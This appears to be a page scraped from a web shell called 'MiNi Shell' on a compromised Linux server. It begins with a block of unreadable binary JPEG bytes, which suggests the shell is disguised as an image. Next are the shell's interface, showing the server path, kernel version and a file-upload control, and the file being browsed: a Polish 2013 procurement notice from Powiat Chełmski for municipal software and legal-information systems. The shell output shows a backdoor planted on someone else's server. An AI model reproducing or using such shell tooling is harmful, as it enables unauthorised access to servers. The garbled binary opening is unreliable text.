JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130830/173409-N-2013.html

<p class="kh_header"><b>Chełm: Zakup oprogramowania, dostępu do systemu informacji prawnej oraz edytora aktów prawnych dla Starostwa Powiatowego w Chełmie oraz czterech urzędów gmin - partnerów Projektu pn. Lepszy urząd tj. Urzędu Gminy Ruda-Huta, Urzędu Gminy Sawin, Urzędu Gminy Siedliszcze, Urzędu Gminy Wierzbica.</b><br>
<b>Numer ogłoszenia: 173409 - 2013; data zamieszczenia: 30.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chełmski , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 82 5627501, faks 82 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chelm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup oprogramowania, dostępu do systemu informacji prawnej oraz edytora aktów prawnych dla Starostwa Powiatowego w Chełmie oraz czterech urzędów gmin - partnerów Projektu pn. Lepszy urząd tj. Urzędu Gminy Ruda-Huta, Urzędu Gminy Sawin, Urzędu Gminy Siedliszcze, Urzędu Gminy Wierzbica..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup oprogramowania, dostępu do systemu informacji prawnej oraz edytora aktów prawnych dla Starostwa Powiatowego w Chełmie oraz czterech urzędów gmin - partnerów Projektu pn. Lepszy urząd, tj. Urzędu Gminy Ruda-Huta, Urzędu Gminy Sawin, Urzędu Gminy Siedliszcze, Urzędu Gminy Wierzbica.


 Zakres zamówienia obejmuje:
 Zamawiający dopuszcza składanie ofert częściowych i w tym celu dokonuje podziału zamówienia na 5 części:

Część 1
Zakup zintegrowanego oprogramowania informatycznego dla urzędu
Część 2
Zakup oprogramowania wspomagającego zarządzanie projektami
Zakup oprogramowania do prowadzenia ewidencji środków trwałych
Zakup kompleksowego systemu do zarządzania zasobami informatycznymi
Zakup oprogramowania do kosztorysowania
Zakup oprogramowania wspomagającego zarządzanie numeracją porządkową nieruchomości
Zakup oprogramowania wspomagającego zarządzanie wydawaniem koncesji alkoholowych
Część 3
Zakup oprogramowania elektroniczna ewidencja dróg
Część 4
Zakup urządzeń inkasenckich do programu obsługi wodno-kan
Zakup oprogramowania mobilnego do zarządzania zgromadzonym zasobem archiwalnym wraz z oprzyrządowaniem

Część 5
Zakup dostępu do systemu informacji prawnej na 2 jednoczesne stanowiska
Zakup dostępu do systemu informacji prawnej na 1 stanowisko
Zakup edytora aktów prawnych licencja open

Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 do SIWZ.
Gwarancja
Wykonawca w ramach serwisu gwarancyjnego będzie świadczył następujące usługi:
w godzinach 8-16 zapewni telefoniczne wsparcie techniczne umożliwiające zgłaszanie usterek oprogramowania.
w godzinach 8-16 zapewni telefoniczne konsultacje merytoryczne przy rozwiązywaniu problemów z oprogramowaniem.
Wykonawca udzieli gwarancji na dostarczone oprogramowanie i sprzęt na okres minimum  2 lat chyba, że w opisie podany jest inny okres, licząc od daty ostatniego protokołu odbioru bez uwag, zapewniając jednocześnie serwis gwarancyjny..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał należycie, w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej 2 usługi polegające na dostawie oraz instalacji oprogramowania, zakupu dostępu do systemu informacji prawnej oraz edytorów aktów prawnych,  w tym jedna usługa dla jednostki samorządu terytorialnego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców  w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy                   z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1  oraz brak podstaw do wykluczenia wskazanych w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> spchelm.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, I piętro,  pokój   Nr 85.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, I piętro, pokój Nr 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> realizacja zamówienia w ramach projektu pn. Lepszy urząd nr POKL.05.02.01-00-02612 współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach konkursu 1POKL5.2.12011 organizowanego przez Ministerstwo Administracji i Cyfryzacji w ramach działania 5.2 Programu Operacyjnego Kapitał Ludzki. Okres realizacji projektu od 1 września 2012 r. do 31 sierpnia 2014 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup oprogramowania, dostępu do systemu informacji prawnej oraz edytora aktów prawnych dla Starostwa Powiatowego w Chełmie oraz czterech urzędów gmin - partnerów Projektu pn. Lepszy urząd, tj. Urzędu Gminy Ruda-Huta, Urzędu Gminy Sawin, Urzędu Gminy Siedliszcze, Urzędu Gminy Wierzbica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup zintegrowanego oprogramowania informatycznego 
Miejsce wykonywania zlecenia - Urząd Gminy Sawin
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 15 grudnia 2013 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup oprogramowania wspomagającego zarządzanie projektami
Zakup oprogramowania do prowadzenia ewidencji środków trwałych
Zakup kompleksowego systemu do zarządzania zasobami informatycznymi
Zakup oprogramowania do kosztorysowania
Zakup oprogramowania wspomagającego zarządzanie numeracją porządkową nieruchomości
Zakup oprogramowania wspomagającego zarządzanie wydawaniem koncesji alkoholowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup oprogramowania wspomagającego zarządzanie projektami
Ilość: 2 sztuki
Miejsce wykonywania zlecenia - Urząd Gminy Sawin, Urząd Gminy Ruda-Huta
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r.
Zakup oprogramowania do prowadzenia ewidencji środków trwałych
Ilość: 1 sztuka
Miejsce wykonywania zlecenia - Urząd Gminy Wierzbica
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r
Zakup kompleksowego systemu do zarządzania zasobami informatycznymi
Ilość: 1 sztuka
Miejsce wykonywania zlecenia - Urząd Gminy Sawin
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r.
Zakup oprogramowania do kosztorysowania
Ilość: 2 sztuki
Miejsce wykonywania zlecenia - Urząd Gminy Sawin, Urząd Gminy SiedliszczeTermin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r.
Zakup oprogramowania wspomagającego zarządzanie numeracją porządkową nieruchomościami
Ilość: 2 sztuki
Miejsce wykonywania zlecenia - Urząd Gminy Sawin, Urząd Gminy Siedliszcze
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r
Zakup oprogramowania wspomagającego zarządzanie wydawaniem koncesji alkoholowych
Ilość: 1 sztuka
Miejsce wykonywania zlecenia - Urząd Gminy Siedliszcze
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup oprogramowania elektroniczna ewidencja dróg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup oprogramowania elektroniczna ewidencja dróg
Ilość: 1 sztuka
Miejsce wykonywania zlecenia - Urząd Gminy Wierzbica
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 31 października 2013 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup urządzeń inkasenckich do programu obsługi wodno-kan
Zakup oprogramowania mobilnego do zarządzania zgromadzonym zasobem archiwalnym wraz z oprzyrządowaniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup urządzeń inkasenckich do programu obsługi wodno-kan.
Miejsce wykonywania zlecenia - Urząd Gminy Wierzbica
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r.
Zakup oprogramowania mobilnego do zarządzania zgromadzonym zasobem archiwalnym wraz z oprzyrządowaniem
Ilość: 1 sztuka
Miejsce wykonywania zlecenia - Starostwo Powiatowe w Chełmie
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r.
DRUKARKA ETYKIET - wymagania minimalne
CZYTNIK KODÓW RĘCZNY - wymagania minimalne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup dostępu do systemu informacji prawnej na 2 jednoczesne stanowiska
Zakup dostępu do systemu informacji prawnej na 1 stanowisko
Zakup edytora aktów prawnych licencja open.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup dostępu do systemu informacji prawnej na 2 jednoczesne stanowiska
Miejsce wykonywania zlecenia - Urząd Gminy Sawin
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r.
Zakup dostępu do systemu informacji prawnej na 1 stanowisko
Miejsce wykonywania zlecenia - Urząd Gminy Wierzbica
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r.
Zakup edytora aktów prawnych licencja open
Ilość: 1 sztuka
Miejsce wykonywania zlecenia - Urząd Gminy Sawin
Termin wykonywania przedmiotu zamówienia: od daty podpisania umowy do 25 września 2013 r.
1.	Wymagania związane z wdrożeniem

Tabela 1 Wykaz modułów z podziałem na jednostki
	Starostwo Powiatowe w Chełmie	Urząd Gminy Sawin	Urząd Gminy Siedliszcze	Urząd Gminy Wierzbica	Urząd Gminy Ruda-Huta
Zakup zintegrowanego oprogramowania informatycznego dla urzędu 		TAK			
Zakup oprogramowania wspomagającego zarządzanie projektami		TAK			TAK
Zakup oprogramowania do prowadzenia ewidencji środków trwałych				TAK	
Zakup kompleksowego systemu do zarzadzania zasobami informatycznymi		TAK			
Zakup oprogramowania do kosztorysowania		TAK	TAK		
Zakup oprogramowania wspomagającego zarządzanie numeracją porządkową nieruchomości		TAK	TAK		
Zakup oprogramowania wspomagającego zarządzanie wydawaniem koncesji alkoholowych			TAK		
Zakup oprogramowania elektroniczna ewidencja dróg				TAK	
Zakup urządzeń inkasenckich do programu obsługi wodno-kan				TAK	
Zakup oprogramowania mobilnego do zarzadzania zgromadzonym zasobem archiwalnym wraz z oprzyrządowaniem	TAK				
Zakup dostępu do systemu informacji prawnej na 2 jednoczesne stanowiska		TAK			
Zakup dostępu do systemu informacji prawnej na 1 stanowisko				TAK	
Zakup edytora aktów prawnych licencja open		TAK			

Tabela 2 Zakres wdrożenia
UG Sawin
1.	Wykonawca skonfiguruje platformę sprzętową Zamawiającego w sposób umożlwiający uruchomienie zintegrowanego oprogramowania informatycznego.
2.	Wykonawca w ramach zamówienia dokona migracji danych z systemu podatkowego Bryk w stopniu umożliwiającym wygenerowanie wymiaru podatkowego w roku 2014.
3.	Zakres wdrożenia:
a)	import planu finansowego oraz budżetu z Systemu Besti@,
b)	analizę i weryfikację układu planu kont zgodnie z wymaganiami Zamawiającego,
c)	konfigurację zestawu dokumentów zgodnie z wymaganiami Zamawiającego,
d)	wprowadzanie Bilansu Otwarcia przez Zamawiającego przy asyście wdrożeniowca,
e)	sprawdzanie przez Zamawiającego czy stan kont po wprowadzeniu Bilansu Otwarcia zgadza się z poprzednim Systemem przy asyście wdrożeniowca,
f)	przeprowadzanie próbnych księgowań dokumentów oraz wyciągów bankowych,
g)	wygenerowanie próbnych raportów i sprawdzenie czy stan kont jest poprawny,
h)	konfiguracja wymiaru podatkowego i integracja z księgowością,
i)	konfiguracja wymiaru dzierżaw i integracja z księgowością,
j)	konfiguracja wymiaru wieczystego użytkowania i integracja z księgowością.
4.	Wykonawca w ramach zamówienia dokona migracji danych z systemu Kadry i Płace (Info System). 
5.	Wykonawca w ramach zamówienia dokona migracji danych z systemu finansowo-księgowego (Info System). 
6.	Wykonawca w ramach zamówienia dokona integracji programu Rozliczenie zużycia wody i nieczystości firmy Mikrobit Sp. z o.o. z Lublina z zintegrowanym oprogramowaniem informatycznym (cześć 1 zamówienia), szczególnie z systemem finansowo-księgowym i kasowym. 
7.	Dostarczenie licencji produktów wymienionych w tabeli 1.

Starostwo Powiatowe w Chełmie
1.	Dostarczenie licencji produktów wymienionych w tabeli 1.

UG Siedliszcze
1.	Wykonawca skonfiguruje platformę sprzętową Zamawiającego w sposób umożlwiający uruchomienie oprogramowania wspomagającego zarządzanie wydawaniem koncesji alkoholowych.
2.	Dostarczenie licencji produktów wymienionych w tabeli 1.

UG Wierzbica
1.	Wykonawca skonfiguruje platformę sprzętową Zamawiającego w sposób umożlwiający uruchomienie oprogramowania do prowadzenia ewidencji środków trwałych.
2.	Dostarczenie licencji produktów wymienionych w tabeli 1.

UG Ruda-Huta
1.	Dostarczenie licencji produktów wymienionych w tabeli 1.

2.	Wymagania związane z szkoleniem
Tabela 3 Zakres szkoleń dla każdego urzędu gminy (zgodnie z zakresem z tabeli 1)
Nazwa systemu/modułu	Użytkownik	Administrator
	liczba godzin przypadająca na system/moduł
Wymiar podatkowy (nieruchomości, rolny i leśny oraz opłata od posiadanych psów)	10 godz.	Łącznie 10 godz.
Wymiar Podatkowy (Ewidencja Zwrotu Akcyzy)	10 godz.	
Wymiar Podatkowy (Podatek od Środków Transportowych)	10 godz.	
Dzierżawy	10 godz.	
Wymiar Podatkowy (Opłata za Wieczyste Użytkowanie Gruntów) 	10 godz.	
Księgowość Podatkowa i Niewymiarowa	30 godz.	
System Finansowo-Księgowy	30 godz.	
System Wymiany Planów i Sprawozdań	2 godz.	
Oprogramowanie raportujące	2 godz.	
Program Raportujący (Portal)	2 godz.	
Zarządzanie środkami trwałymi 	4 godz.	
Rejestr zezwoleń na sprzedaż napojów alkoholowych	4 godz.	
Stypendia	4 godz.	
Kadry	10 godz.	
Płace	10 godz.	
Kasa	5 godz.	
Oprogramowanie do prowadzenia ewidencji środków trwałych	4 godz.	1 godz.
Oprogramowanie wspomagające zarządzanie wydawaniem koncesji alkoholowych	4 godz.	1 godz.
Oprogramowanie wspomagającego zarządzanie numeracją porządkową nieruchomościami	4 godz.	-
Oprogramowanie elektroniczna ewidencja dróg	5 godz.	1 godz.

2.	GWARANCJA
2.1.	WYKONAWCA W RAMACH SERWISU GWARANCYJNEGO BĘDZIE ŚWIADCZYŁ NASTĘPUJĄCE USŁUGI:
a.	w godzinach 8-16 zapewni telefoniczne wsparcie techniczne umożliwiające zgłaszanie usterek oprogramowania.
b.	w godzinach 8-16 zapewni telefoniczne konsultacje merytoryczne przy rozwiązywaniu problemów z oprogramowaniem.
2.2.	Wykonawca udzieli gwarancji na dostarczone oprogramowanie i sprzęt na okres minimum 2 lat (chyba, że w opisie podany jest inny okres), licząc od daty ostatniego protokołu odbioru bez uwag, zapewniając jednocześnie serwis gwarancyjny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com